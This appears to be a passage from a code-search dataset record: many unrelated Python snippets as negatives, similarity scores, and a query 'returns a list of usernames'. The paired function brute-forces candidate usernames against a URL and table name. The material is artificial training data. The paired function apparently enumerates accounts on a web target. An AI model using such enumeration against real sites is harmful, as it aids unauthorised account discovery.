- k) if n - k in count else (1, 0)\n return dp0 + dp1, dp0 * (pow(2, count[n]) - 1)\n\n return functools.reduce(operator.mul, (sum(dp(n)) for n in count if not count[n + k])) - 1", "def weak_compositions(n, k):\n if n < 0 or k < 0:\n return\n elif k == 0:\n # the empty sum, by convention, is zero, so only return something if\n # n is zero\n if n == 0:\n yield []\n return\n elif k == 1:\n yield [n]\n return\n else:\n # For each first integer i in range(n+1), list all compositions\n # on n-i nodes, of length at most k-1.\n for i in range(n+1):\n for comp in weak_compositions(n-i, k-1):\n yield [i] + comp", "def build(s, k, T):\n L = len(T)\n f = int(''.join(T) + str(s))\n sf = k * f\n tail = str(sf)[-(L+1):]\n # print('Multiplying %s by %s gives %s (...%s)' % (f, k, sf, tail))\n assert len(tail) == L + 1\n T = list(tail)\n return T", "def enumerate_kmers(string, k, start=0):\n for i in range(0, len(string) - k + 1):\n yield start + i, string[i:i+k]", "def Get(self,k:int): \n ### get partitions depending on the partition schemes C that depends on k!\n return subsets_k(list(range(self._n)),k)", "def allpermutations(orgset, k):\n return itertools.chain(*[permutation(orgset, i) for i in range(1, k + 1)])", "def k_subsets(set_, k):\n ensure_countable(set_)\n\n if not isinstance(k, Integral):\n raise TypeError(\"subset cardinality must be a number\")\n if not (k >= 0):\n raise ValueError(\"subset cardinality must be positive\")\n if not (k <= len(set_)):\n raise ValueError(\"subset cardinality must not exceed set cardinality\")\n\n result = combinations(set_, k)\n return _harmonize_subset_types(set_, result)", "def permute(n: int, k: int) -> int:\n\n # no possible permutations if k > n\n if n < k:\n return 0\n\n # if faster, compute n! and (n - k)! and return their quotient\n fact_count = len(_factorial_sequence)\n if n - fact_count <= k:\n return factorial(n) // factorial(n - k)\n\n # compute the product (n - k + 1) * (n - k + 2) * ... 
* n\n return seqs.arithmetic_product(n - k + 1, k)", "def cut_kmer(sequence, kmer_size):\n for i in range(len(sequence)-kmer_size+1):\n try:\n yield sequence[i:kmer_size+i]\n except StopIteration:\n return", "def string_to_kmers(s: str, k: int) -> List[str]:\n for i in range(0, len(s), k):\n yield s[i:i + k]", "def count_subsequence_in_sliding_window(kmin, kmax, sequence):\n if isinstance(sequence, str):\n for n in range(kmin, kmax + 1):\n for sub in zip(*(deque(itertools.islice(it, i), 0) or\n it for i, it in enumerate(itertools.tee(sequence,\n n)))):\n yield ''.join(sub)", "def kmers_from_dna(dna, k):\n assert k >= 1\n assert len(dna) >= k\n\n assert len(dna) >= k\n for i in range(0, len(dna) - k + 1):\n kmer = dna[i:i + k]\n yield kmer", "def rotate(self, nums, k):\n length=len(nums)\n nums[:]=nums[length-k:length]+nums[0:length-k]\n return nums", "def partial_permutations(n, k):\n return int((factorial(n) / factorial(n - k)) % 1000000)", "def Split(self, k):\n n = len(self)\n start = range(0, n, ceil(n / k))\n end = list(start[1:]) + [n]\n return [range(first, last) for first, last in zip(start, end)]", "def getKmers(seq, k):\n \n kmd = {}\n \n for i in range(len(seq)+1-k):\n kmer = seq[i:i+k]\n kmd[kmer] = kmd.get(kmer,0) + 1\n return kmd", "def kmers(sequence, alphabet, k):\n mers = (''.join(c) for c in windowed(k, sequence))\n return [mer for mer in mers if all(base in set(alphabet) for base in mer)]", "def compute_freq(text, k):\n freq_array = [0 for i in range(0, 4**k)]\n for i in range(0, len(text) - k + 1):\n pattern = text[i:i + k]\n j = pattern_to_number(pattern)\n freq_array[j] += 1\n # return ' '.join([str(i) for i in freq_array])\n return freq_array", "def combo(N,K):\n assert type(N)==list\n assert type(K)==int\n for k in N:\n assert type(k)==int\n assert K>0 and K<=len(N)\n \n main_combo = []\n #Finds the power list of the inputted list and loops through the power list for lists with length 'K'.\n for l in power_list(N):\n if len(l)==K:\n main_combo.append(l)\n return main_combo #Returns a list of list combinations with length 'K'.", "def numKLenSubstrNoRepeats(self, S, K):\n return self.for_loop(S, K)", "def rotate(nums: List[int], k: int) -> None:\n def fragReverse(left_index: int, right_index: int, frag: List[int]):\n while left_index < right_index:\n frag[left_index], frag[right_index] = frag[right_index], frag[left_index]\n left_index += 1\n right_index -= 1\n \"\"\"方案六:切片翻转法\"\"\"\n m = abs(k) % len(nums)\n if m == 0:\n return\n nums.reverse()\n if k > 0:\n fragReverse(0, m - 1, nums)\n fragReverse(m, len(nums) - 1, nums)\n elif k < 0:\n fragReverse(0, len(nums) - 1 - m, nums)\n fragReverse(len(nums) - m, len(nums) - 1, nums)", "def _get_exact_k_skip_n_grams(arr, n, k):\n for i in range(len(arr) - n - k + 1):\n part = arr[i:i+n+k]\n\n if k == 0:\n yield part\n else:\n for j in combinations(part[1:-1], n - 2):\n yield tuple([part[0]] + list(j) + [part[-1]])", "def get_subs(n):\n \n from itertools import product\n return [''.join(sub) for sub in product('CATGN', repeat=n)]", "def __combination(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __combination(orgset[i + 1 :], k - 1):\n yield (x,) + s", "def get_mers(sequence, kmin, kmax):\n for k in range(kmin, kmax + 1):\n return (''.join(mers) for mers in windowed(sequence, k))", "def find_kmers(in_fasta, k):\n n= len(in_fasta)-k+1\n kmers=[]\n for i in range(0, n):\n kmers.append(in_fasta[i:i+k])\n return(kmers)", "def 
main():\n check_input(sys.argv[0])\n with open(sys.argv[1]) as infile:\n n = int(infile.readline().strip())\n k = int(infile.readline().strip())\n\n print(partial_permutations(n, k))", "def kchainbasis(h, k):\n\n import itertools as it\n kchains = set()\n for e in h.edges():\n if len(e) == k + 1:\n kchains.add(tuple(sorted(e.uidset)))\n elif len(e) > k + 1:\n kchains.update(set(it.combinations(sorted(e.uidset), k + 1)))\n return sorted(list(kchains))", "def rotate(nums, k):\n nums = nums[(len(nums) - k):] + nums[:(len(nums) - k)]", "def build_kmers(\n sequence, \n ksize):\n\n kmers = list()\n n_kmers = len(sequence) - ksize + 1\n # Loop to store khmers in each sequence\n for i in range(n_kmers):\n kmer = sequence[i:i + ksize]\n kmers.append(kmer)\n \n return kmers, n_kmers\n\n # It is an example that needs to say the size of Kmer you would like.", "def get_chunks(indivs, k):\r\n\tpair_chunk_collection=[]\r\n\tfor i in xrange(0, len(indivs[0])-k+1, k):\r\n\t\tchunks=[]\r\n\t\tfor x in indivs:\r\n\t\t\tchunks.append(x[i:i+k])\r\n\t\tpartial_phase_pairs=tune_em(chunks, 5)[1]\r\n\t\tprint partial_phase_pairs\r\n\t\tpair_chunk_collection.append(partial_phase_pairs)\r\n\treturn pair_chunk_collection", "def kmers_composition(dna: str, k: int, alphabet: str = \"ACGT\"):\n dna = Counter(string_to_kmers(dna, k))\n for k_mer in enumerate_kmers(alphabet, k):\n yield dna[k_mer]", "def create_kmers(seq,kmer_size):\n\n return [seq[i:(i+kmer_size)] for i in range(len(seq)-kmer_size+1)]", "def kmer_count(self,size):\n if size == 1:\n return ['A','T','C','G']\n else:\n result = []\n for seq in Analyze_DNA_Sequence.kmer_count(self,size-1):\n for base in ['A','T','C','G']:\n result.append(seq+base)\n return result", "def choices(symbols, k):\n return [R.choice(symbols) for _ in range(k)]", "def sol(s, k):\n f = [0]*26\n for x in s:\n f[ord(x)-97] -= 1\n # We store the negative of the frequencies\n \n heapq.heapify(f)\n # Make it a max heap\n \n while k and f:\n d = heapq.heappop(f)\n heapq.heappush(f, d+1)\n # Reduce the max frequency by 1 and k by 1 till k exists\n k-=1\n \n res = 0\n for x in f:\n res += x**2\n # Return the result, we dont care for the '-' since its gets squared\n return res", "def split_list(l, k):\n\n\tn = len(l)\n\tsublists = []\n\tnsubs = n / k\n\tnrems = n % k\n\n\t# little algo to split lists.\n\n\ti = int(0)\n\twhile i < n:\n\t\tsublists.append(l[i:i+k])\n\t\ti += k\n\n\treturn sublists", "def restricted_growth_sequences(n):\n # k - biggest value that should be contained in subsequence\n for k in range(n):\n # initially seq = [0, 0, ... 
0, 1, 2, ..., k-1, k]\n seq = [0] * (n - k) + list(range(1, k+1))\n # final = [0, 1, 2, ..., k-1, k, ..., k]\n final = list(range(k)) + [k] * (n - k)\n while seq != final:\n yield seq\n seq = next_rgs(seq, n, k)\n yield final", "def enumerate_kmers(alphabet: Union[str, List[str]], length: int):\n for value in itertools.product(alphabet, repeat=length):\n yield \"\".join(value)", "def retrieve_sub(s, n):\n subs = []\n for idx, char in enumerate(s):\n sub = char\n c = 1\n for next_char in s[idx + 1:]:\n if c >= n:\n break\n else:\n sub += next_char\n c += 1\n subs.append(sub)\n return [x for x in subs if len(x) == n]", "def permutations(k: int) -> int:\n return factorial(k)", "def marbles(n: int, k: int) -> int:\n # return (n-1) Choose (k - 1)\n # which is the number of possibilities with the given constraints.\n return n_choose_k(n - 1, k - 1)", "def sample_n_k(n, k):\n\n if not 0 <= k <= n:\n raise ValueError(\"Sample larger than population or is negative\")\n if k == 0:\n return np.empty((0,), dtype=np.int64)\n elif 3 * k >= n:\n return np.random.choice(n, k, replace=False)\n else:\n result = np.random.choice(n, 2 * k)\n selected = set()\n selected_add = selected.add\n j = k\n for i in range(k):\n x = result[i]\n while x in selected:\n x = result[i] = result[j]\n j += 1\n if j == 2 * k:\n # This is slow, but it rarely happens.\n result[k:] = np.random.choice(n, k)\n j = k\n selected_add(x)\n return result[:k]", "def batch(iterable, k=3):\n\n for i in range(0, len(iterable), k):\n yield iterable[i:i + k]", "def next_rgs(seq, n, k):\n # b[i] = max(seq[i - 1], b[0], ..., b[i - 1]) = max(seq[i - 1], b[i - 1])\n # All restricted growth sequences start with 0\n b = [0]\n result = seq[:]\n for i in range(1, n):\n b.append(max(seq[i - 1], b[i - 1]))\n # Find the earliest index when previous and next sequence are diverging\n for j in range(n - 1, 0, -1):\n if seq[j] + 1 > k:\n continue\n if seq[j] > b[j]:\n continue\n break\n # Create components of new result\n # prefix - maximal common prefix of original and new sequence\n prefix = seq[:j]\n # incremented - the value at j-th place that was incremented\n incremented = seq[j] + 1\n # suffix_length - how many nonzero numbers should we put at the end\n # of new sequence to make it restricted-growing\n # and to have all numbers 0..(k-1) in it.\n suffix_length = k - max(b[j], incremented)\n zeroes = [0] * (n - j - suffix_length - 1)\n suffix = list(range(k - suffix_length + 1, k + 1))\n # Construct new sequence\n result = prefix + [incremented] + zeroes + suffix\n return result", "def k_skip_n_grams(arr, n, k):\n if n == 0:\n return\n\n if n == 1:\n for e in arr:\n yield e\n return\n\n for i in range(0, min(len(arr) - n, k) + 1):\n yield from _get_exact_k_skip_n_grams(arr, n, i)", "def perms(n, k):\n if n < k:\n return 0\n return partition(n, [n - k])", "def is_possible(strs, k):\n for i in xrange(len(strs) / k):\n rows = strs[i * k: (i + 1) * k]\n for j in xrange(len(strs[0]) / k):\n piece = [row[j * k: (j + 1) * k] for row in rows]\n target = piece[0]\n for s in piece:\n if s != target:\n return \"Impossible\"\n return \"Possible\"", "def collatz_sequence_term(seed, k):\n if k == 1:\n return seed\n a = seed\n for i in range(k - 1):\n a = collatz(a)\n if a == 1:\n return None if k > i + 2 else a\n return a", "def combinations(n, k):\n return factorial(n) / (factorial(k) * factorial(n - k))", "def generate_candidates(L_k, k):\n candidates = []\n\n # Iterate over every possible pair of transactions and \n # append their union to candidates if the union 
is \n # one element larger than an itemset in L_k \n # (emulate self joining L_k)\n candidates = set()\n for item in itertools.combinations(L_k, 2):\n union_ = frozenset(item[0].union(item[1]))\n if len(union_) == k+1:\n candidates.add(union_)\n \n # Convert candidates into a list with each candidate converted to custom set\n candidates = [CandidateItem(candidate) for candidate in candidates]\n\n # Prune\n candidates_to_remove = []\n for candidate in candidates:\n # if there's any itemset of size k in each candidate that is not in L_k, add it to the\n # list of candidates to be removed\n if any([c for c in itertools.combinations(candidate, k) if not any([L for L in L_k if len(set(c) & set(L)) == k])]):\n candidates_to_remove.append(candidate)\n \n for i in candidates_to_remove:\n candidates.remove(i)\n \n return candidates", "def n_choose_kv(newK):\n values = np.zeros((1,newK+1))\n ks = np.arange(newK+1)\n \n for i in range(newK+1):\n values[i] = scipy.misc.comb(newK, ks[i])\n\n return values", "def rotate(self, nums, k):\n lenth = len(nums)\n nums[:] = nums[lenth-k:]+nums[:lenth-k]\n return nums", "def MCS(n,k):\n\tglobal dict_all\n\tdict_val=copy.deepcopy(dict_all)\n\t#start_time = time.time()\n\tfinal = {}\t\t\t\t\t # Store all result with the count as key. For example final[1]=[[1,0,0],[0,1,1]]\n\tseq = []\t\t\t\t\t\t# Store the count with no duplication\n\tfor i in range(n):\n\t\tleaf={}\t\t\t\t\t\t# leaf is the dictionary to store the random value of each leaf\n\t\t#count=0\n\t\tfor i in leaves:\n\t\t\tleaf[i] = choice([0,1])\n\t\t\tdict_val[i]=leaf[i]\n\t\t\t#count += leaf[i]\n\t\tresult = Cal_FT(dict_val)\t\n\t\t'''\n\t\tif result:\n\t\t\tcutset = []\n\t\t\tfor i in leaves:\n\t\t\t\tcutset.append(str(leaf[i]))\n\t\t\tcutset=\"\".join(cutset)\n\t\t\tif cutset not in final:\n\t\t\t\tfinal[cutset]=count\n\tfinal_sorted=sorted(zip(final.values(),final.keys())) \t\t\t\t#Order the cutset by its count\n\tfor i in range(k):\t\t\t\t\t\t\t\t\t\t\t\t\t#Print the first k result\n\t\tcutset=list(final_sorted[i][1])\n\t\tresult=[]\n\t\tfor index in range(len(cutset)):\n\t\t\tif cutset[index] is \"1\":\n\t\t\t\tresult.append(leaves[index])\n\t\tprint result\n\t#end_time=time.time()\n\t#print \"Running time is\", end_time-start_time\n\t'''", "def generate_combinations(k: int, n: int):\n result = list()\n for i in range(1, k + 1):\n for bits in itertools.combinations(range(n), i):\n s = [0] * n\n for bit in bits:\n s[bit] = 1\n result.append(s)\n\n return pd.DataFrame(result)", "def sample_without_replacement(k, xsc):\n xs = list(xsc)\n ans = []\n\n while (k > 0) and (xsc != []):\n i = randint(0, len(xsc) - 1)\n ans.append(xsc.pop(i))\n k -= 1\n\n return ans", "def distinct_substrigns(str1, k):\n hash_map = {}\n n = len(str1)\n start = 0 \n end = 1\n hash_map[str1[start]] = 1\n res = [] \n\n while end < n:\n print (\"hash_map is :\", hash_map)\n if str1[end] not in hash_map: \n hash_map[str1[end]] = 1\n else:\n while str1[start]!=str1[end]:\n del hash_map[str1[start]]\n start += 1\n start += 1\n\n if end-start+1 == k:\n temp = str1[start:end+1]\n if temp not in res:\n res.append(temp)\n del hash_map[str1[start]]\n start += 1\n end += 1\n #print(end,start)\n return res", "def rotate(self, nums: List[int], k: int) -> None:\n n = len(nums)\n k %= n\n if k == 0:return \n start = 0\n tmp = nums[start]\n cnt = 0\n while cnt < n:\n nxt = (start + k) % n\n while nxt != start:\n nums[nxt], tmp = tmp, nums[nxt]\n nxt = (nxt+k) % n\n cnt += 1\n nums[nxt] = tmp\n start += 1\n tmp = nums[start]\n cnt += 1", 
"def allcombinations(orgset, k):\n return itertools.chain(*[combination(orgset, i) for i in range(1, k + 1)])", "def clumps_finding(text, k, t, L):\n frequent_patterns = []\n clumps = [0 for i in range(0, 4**k)]\n for i in range(0, len(text) - L + 1):\n subtext = text[i:i + L]\n freq_array = compute_freq(subtext, k)\n for index, freq in enumerate(freq_array):\n if freq >= t:\n clumps[index] = 1\n for index, clump in enumerate(clumps):\n if clump == 1:\n pattern = number_to_pattern(index, k)\n frequent_patterns.append(pattern)\n return frequent_patterns", "def rotate1(nums, k):\n n = len(nums)\n\n if k == 0:\n return nums\n if n < 2:\n return nums\n\n k = k % n # In case k > len(nums), prevent redundant rotations\n\n new_nums = [0] * n\n\n for i in range(n):\n j = (i + k) % n # Use modulo for wrap-around\n new_nums[j] = nums[i]\n\n return new_nums", "def sample(self, k):\n result = \"\"\n current = self.gen_beginning()\n for i in range(0, k):\n result += current[0] + \" \"\n t = tuple(current)\n if t in self.dict:\n c_sum = self.dict[t][self.sum_index]\n rand = random.randint(0, c_sum)\n new_term = \"\"\n for term, count in self.dict.iteritems():\n if rand > count:\n rand -= count\n else:\n new_term = term\n break\n current.remove(current[0])\n current.append(new_term)\n else:\n current = self.gen_beginning()\n return result", "def number_to_kmer(n, k):\n assert k >= 1\n _, number_to_nucleotide = nucleotide_numbering()\n if k == 1:\n return number_to_nucleotide[n]\n prefix_number = n // 4\n r = n % 4\n nucleotide = number_to_nucleotide[r]\n prefix_dna = number_to_kmer(prefix_number, k - 1)\n res = prefix_dna + nucleotide\n return res", "def better_clumps_finding(text, k, t, L):\n frequent_patterns = []\n clumps = [0 for i in range(0, 4**k)]\n first_subtext = text[:L]\n freq_array = compute_freq(first_subtext, k)\n for index, freq in enumerate(freq_array):\n if freq >= t:\n clumps[index] = 1\n for i in range(1, len(text) - L + 1):\n old_kmer = text[i - 1:i - 1 + k]\n old_kmer_number = pattern_to_number(old_kmer)\n freq_array[old_kmer_number] -= 1\n new_kmer = text[i + L:i + L + k]\n new_kmer_number = pattern_to_number(new_kmer)\n freq_array[new_kmer_number] += 1\n if freq_array[new_kmer_number] >= t:\n clumps[new_kmer_number] = 1\n for index, clump in enumerate(clumps):\n if clump == 1:\n pattern = number_to_pattern(index, k)\n frequent_patterns.append(pattern) \n return frequent_patterns", "def partition(n, k=None, zeros=False):\n if not zeros or k is None:\n for i in ordered_partitions(n, k):\n yield tuple(i)\n else:\n for m in range(1, k + 1):\n for i in ordered_partitions(n, m):\n i = tuple(i)\n yield (0,)*(k - len(i)) + i", "def rotate(nums, k) -> None:\r\n\r\n for i in range(len(nums)-k):\r\n tmp = nums.pop(0)\r\n nums.append(tmp)\r\n\r\n\r\n print(nums)", "def fn(arr, k):\n ans = []\n for i, x in enumerate(arr): \n while ans and ans[-1] < x and len(ans) + len(arr) - i > k: ans.pop()\n if len(ans) < k: ans.append(x)\n return ans", "def kmodels(wordlen: int, k: int, input=None, output=None):\n\n assert 0 <= k < 2**wordlen\n if output is None:\n output = _fresh()\n\n if input is None:\n input = _fresh()\n\n imap, omap = BundleMap({input: wordlen}), BundleMap({output: 1})\n atoms = map(aiger.atom, imap[input])\n\n active = False\n expr = aiger.atom(False)\n for atom, bit in zip(atoms, encode_int(wordlen, k, signed=False)):\n active |= bit\n if not active: # Skip until first 1.\n continue\n expr = (expr | atom) if bit else (expr & atom)\n\n aig = expr.aig['o', {expr.output: 
omap[output][0]}]\n aig |= aiger.sink(imap[input])\n return aigbv.AIGBV(imap=imap, omap=omap, aig=aig)", "def chunkedClumpFinder(sequence, k, L, t):\n\n frequentPatterns = set([])\n for i in range(len(sequence)):\n window = sequence[i:i + L]\n frequencies = {}\n\n for j in range(len(window)):\n pattern = window[j:j + k]\n if pattern not in frequencies:\n frequencies[pattern] = 1\n else:\n frequencies[pattern] += 1\n for p in frequencies:\n if frequencies[p] >= t:\n frequentPatterns.add(p)\n return frequentPatterns", "def clump_forming_kmers(string, k, l, t):\n clumpFormingKmers = set()\n # Initial counts of k-mers within length l window starting from the first\n # chracter of the string.\n counts = Counter([kmer for i, kmer in enumerate_kmers(string[:l], k)])\n clumpFormingKmers = add_clump_forming_kmers(counts, clumpFormingKmers)\n\n for i in range(1, len(string) - l + 1):\n counts[string[i-1:i-1+k]] -= 1\n counts[string[i+l-k:i+l]] += 1\n clumpFormingKmers = add_clump_forming_kmers(counts, clumpFormingKmers)\n\n return list(clumpFormingKmers)", "def combinations(n, k):\r\n return exp(gammaln(n + 1) - gammaln(k + 1) - gammaln(n - k + 1))", "def length_of_longest_substring(arr, k):\n window_start = 0\n max_repeat_times = 0\n frequency_map = {0: 0, 1: 0}\n len_longest = 0\n\n for window_end in range(len(arr)):\n right_char = arr[window_end]\n left_char = arr[window_start]\n frequency_map[right_char] += 1\n max_repeat_times = frequency_map[0]\n\n if max_repeat_times > k:\n frequency_map[left_char] -= 1\n window_start += 1\n len_longest = max(len_longest, window_end - window_start + 1)\n\n return len_longest", "def chunks(cipher, size):\n\treturn [cipher[i*size:(i+1)*size] for i in range(int(math.ceil(len(cipher)*1.0/size)))]", "def part_recur(ckt, initial, w):\n partition_set = []\n# partition_mech = KLPart.KLPartition()\n# convert_Gate(ckt, partition_mech)\n print \"Diving into C++\"\n# (a, b) = partition_mech.partition_once(KLPart.StringVector(list(set(initial))))\n (a, b) = partition(ckt, list(set(initial)))\n print \"Coming back up\"\n if len(get_inputs(ckt, a)) > w and len(a) > 3:\n partition_set = partition_set + part_recur(ckt, a, w)\n else:\n partition_set.append(a)\n if len(get_inputs(ckt, b)) > w and len(b) > 3:\n partition_set = partition_set + part_recur(ckt, b, w)\n else:\n partition_set.append(b)\n return partition_set", "def combinarink(list, k):\n global visited\n global indexes\n visited = [0 for x in range(0, len(list) + 1)] # init with 0\n indexes = [x for x in range(0, len(list) + 1)] # init indexes with 0...n-1\n output = combinari(1, len(list), k, list, [])\n print (output)" ]
[ "0.6393046", "0.63518596", "0.6346528", "0.63429147", "0.62951434", "0.62502956", "0.62439233", "0.61887056", "0.6169127", "0.6153225", "0.61380696", "0.6062542", "0.6060054", "0.6024283", "0.6011528", "0.6003349", "0.59933025", "0.5982021", "0.5982021", "0.59802747", "0.59543186", "0.5937869", "0.5930514", "0.59005123", "0.5885605", "0.58799535", "0.58694834", "0.5865896", "0.58610773", "0.58521634", "0.58449274", "0.58398014", "0.58184046", "0.58039916", "0.577591", "0.57745343", "0.57710034", "0.5770836", "0.5764095", "0.57549673", "0.57414573", "0.5737963", "0.57226783", "0.57216275", "0.571604", "0.56951237", "0.56906766", "0.5685328", "0.5683789", "0.56820077", "0.5668515", "0.5648699", "0.56456566", "0.5638915", "0.5621852", "0.56148845", "0.5609998", "0.56053877", "0.56047124", "0.5598647", "0.55769974", "0.557267", "0.5572357", "0.5571756", "0.55685955", "0.55558515", "0.55555475", "0.554838", "0.5544726", "0.553872", "0.5534585", "0.5516193", "0.5502239", "0.55015963", "0.5487095", "0.548323", "0.5482142", "0.54733986", "0.5470544", "0.5461158", "0.545335", "0.54532284", "0.54490167", "0.5445134", "0.54402304", "0.54292524", "0.5422276", "0.5412574", "0.5411632", "0.5411186", "0.5390162", "0.5389234", "0.5388295", "0.5374496", "0.536874", "0.53655356", "0.53628176", "0.53619087", "0.5357846", "0.5356749" ]
0.85543895
0
returns a list of usernames
def userNames(lst, url, tableName): n = len(lst) # https://docs.python.org/3/library/itertools.html#itertools.product # https://stackoverflow.com/questions/3034014/how-to-apply-itertools-product-to-elements-of-a-list-of-lists lst2 = list(itertools.product(*lst)) lst3 = list(map("".join, lst2)) # # Maybe use checkUsernameSequences here, # then add a check to reduce the amount of possibilities before building lst? # seq = checkUsernameSequences(n, lst, url, tableName, minLen = 2, maxLen = 2) # does not include the single characters since minLen > 1 lst4 = filt(seq, lst3) """# next time: find matching strings. That should (hopefully) reduce the space to search. REMEMBER, this filtering will miss all single character usernames!!! https://docs.python.org/3/library/re.html#regular-expression-syntax https://stackoverflow.com/questions/3640359/regular-expressions-search-in-list https://stackoverflow.com/questions/3040716/python-elegant-way-to-check-if-at-least-one-regex-in-list-matches-a-string https://stackoverflow.com/questions/19300020/python-match-a-string-with-regex https://stackoverflow.com/questions/37974047/if-any-strings-in-a-list-match-regex """ lst5 = [x for x in lst4 if checkUsername(x, url, tableName)] # lst = list(map(checkUsername, lst2)) return lst5
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_usernames(self) -> list:\n db_list = list(self.cursor.execute('SELECT * FROM sqlite_master'))\n users = [db_list[i][1] for i in range(0, len(db_list), 2)]\n return users", "def user_list(self):\n self.cur.execute(\"SELECT username FROM users\")\n users = []\n for username in self.cur.fetchall():\n users.append(username[0])\n return users", "def fetch_usernames(self, users):\n user_list = []\n for user in users:\n user_list.append(user.username)\n return user_list", "def user_names(self):\n results = []\n for user_detail in self.users:\n results.append(user_detail.user_name)\n results.sort()\n return results", "def all_users():\n\treturn [unicode(name[:-4]).lower() for name in os.listdir(os.path.join(WORLD_DIR, 'players'))]", "def user_names(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"user_names\")", "def example_usernames():\n return [\"A\", \"B\", \"C\"]", "def check_user_name(self, username):\n usernames = []\n for user in self.__users:\n if user['username'] == username:\n usernames.append(user)\n return usernames", "def get_blocked_usernames_list():\n return []", "def listusers():\n allusers = []\n with open('/etc/passwd', 'r') as pw:\n for l in pw.readlines():\n allusers.append(l.split(':')[0])\n users = [ d for d in os.listdir(\"/home\") if d in allusers ]\n return(users)", "def GetUserNamesList():\n\n # Create a list\n time.sleep(5)\n usernameslist = []\n\n html = Global.driver.page_source\n\n page = soup(html, \"lxml\")\n\n # Get all usernames\n table = page.find('div', class_=\"user-management-table-view\")\n\n tablebody = table.find('tbody')\n\n elements = tablebody.find_all('tr')\n\n for tr_tag in elements:\n usernameelement = tr_tag.find('span')\n\n username = usernameelement.text.strip('\\n')\n\n usernameslist.append(username)\n\n return usernameslist", "def list_users(item):\n users = User.load_all_users(item)\n for user in users:\n print(user.username)", "def users(self) -> List[str]:\n return self._users", "def get_usernames(self, selector: Optional[Callable[[User], bool]]=None) -> Set[str]:\n return set([u.name for u in self.iter_users(selector)])", "def users():\n retlist = []\n rawlist = cext.users()\n for item in rawlist:\n user, hostname, tstamp = item\n user = py2_strencode(user)\n nt = _common.suser(user, None, hostname, tstamp, None)\n retlist.append(nt)\n return retlist", "def get_all_users():", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def user_names(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"user_names\")", "def get_RegisteredUsersList(test_case, override_headers=null, override_cookies=null):\n # type: (AnyMagpieTestCaseType, Optional[HeadersType], Optional[CookiesType]) -> List[Str]\n app_or_url = get_app_or_url(test_case)\n resp = test_request(app_or_url, \"GET\", \"/users\",\n headers=override_headers if override_headers is not null else test_case.json_headers,\n cookies=override_cookies if override_cookies is not null else test_case.cookies)\n json_body = check_response_basic_info(resp, 200, expected_method=\"GET\")\n return json_body[\"user_names\"]", "def get_users(self):\n fields = ['name', ]\n return self.get_data(\"myUsers\", fields)", "def list_users():\n\ttry:\n\t\tusers_call = sc.api_call(\"users.list\")\n\t\tusers = []\n\t\tif users_call.get('ok'):\n\t\t\treturn users_call['members']\n\texcept:\n\t\tprint(\"users error\")\n\treturn None", "def users():\n access_token = 
session['access_token']\n return \"%s\" % list_users(access_token)", "def list_users(self):\n return self.get_admin(\"users\")", "def get_users_name(self, session) -> Tuple[int, str, str]:\n users = (\n session.query(User.chat_id, User.first_name, User.last_name)\n .filter(User.is_admin==False)\n .all()\n )\n return users", "def get_user_list(self):\n self.user_list = db.get_user_list()\n for each in self.user_list:\n print each[1] # username\n while(True):\n selection = raw_input(\"Enter username to use\")\n if selection in self.user_list:\n return selection", "def getUsers(self):\n return [u[0] for u in pwd.getpwall()\n if (u[5].startswith('/home/') and u[6].endswith('sh'))]", "def get_names(user_indexes):\n users = conf[\"users\"]\n names = []\n for i in user_indexes:\n if i < 1:\n names.append(\"{0} Unknown\".format(i))\n else:\n names.append(\"{0} {1}\".format(i, users[i-1]))\n return names", "def list_users(self):\n raise NotImplementedError", "def get_user_list(host):\n users = query(\"$.host.'{host}'.user\", host=host)\n if isinstance(users, (str, unicode)):\n users = users.replace(', ', ' ').replace(',', ' ').split(' ')\n return users or []", "def _get_users_list(self):\n return self.users['user_id'].tolist()", "def do_list_users(self, line):\n users = self.protocol.cmd_list_users(exp=line, return_list=True)\n t = PrettyTable(users[0])\n for u in users[1:]:\n t.add_row(u)\n print(t)", "def _users_list(self):\n result = self.slack.api_call(\"users.list\", presence=0)\n\n if not result.get(\"ok\"):\n logging.error(result['error'])\n return None\n\n return result['members']", "def get_usernames(user_ids: List[int]) -> Union[str, List[str]]:\n with engine.connect() as conn:\n usernames = conn.execute(f\"\"\"\n SELECT username FROM users WHERE id IN ({', '.join(['%s'] * len(user_ids))})\n \"\"\", user_ids).fetchall()\n return [x[0] for x in usernames]", "def user_list(server_object, client, address, command_args):\n\n\tmsg = \"\"\n\n\t#: Create a formatted string of all the users.\n\tfor usr in server_object.usrs.values():\n\t\tmsg += usr + '\\n'\n\n\tclient.send(msg.encode())", "def get_user_list():\n\tudb = UserPageDB()\n\ttry:\n\t\tusers = udb.user_list()\n\t\treturn UserList([_transform_user(u) for u in users])\n\tfinally:\n\t\tudb.close()", "def get_users():\n users = functions.users()\n return users", "def get_user_list():\n users_tuple = db_session.query(Chat.chatID).all()\n users_list = [user for user, in users_tuple]\n return users_list", "def get_users(self):\r\n\t\tlogger.debug(\"Fetch users\")\r\n\t\t\r\n\t\treturn login.get_users()", "def list_user(self, username):\n return self.get_admin(u\"users/{}\".format(username))", "def list_users():\n\n users = User.query.order_by(\"last_name\").all()\n return render_template(\"users/user_list.html\", users=users)", "def users(self):\n return self.get_data(\"users\")", "def display_users(cls):\n return cls.user_list", "def getNames(self) -> List[unicode]:\n ...", "def listUsers(self):\n return self._client.listUsers()", "def __list_all_users(self):\n\n usernames_dict = get_data.get_usernames_dict()\n if len(usernames_dict) > 0:\n first_str = 'user'\n second_str = 'posts scraped'\n descriptor = '{:<40} {}'\n print('')\n print(descriptor.format(first_str, second_str))\n print(descriptor.format(len(first_str) * '-', len(second_str) * '-'))\n for number, username in usernames_dict.items():\n space_str = ' ' if len(str(number)) > 1 else ' '\n first = '[' + space_str + str(number) + '] ' + username\n second = 
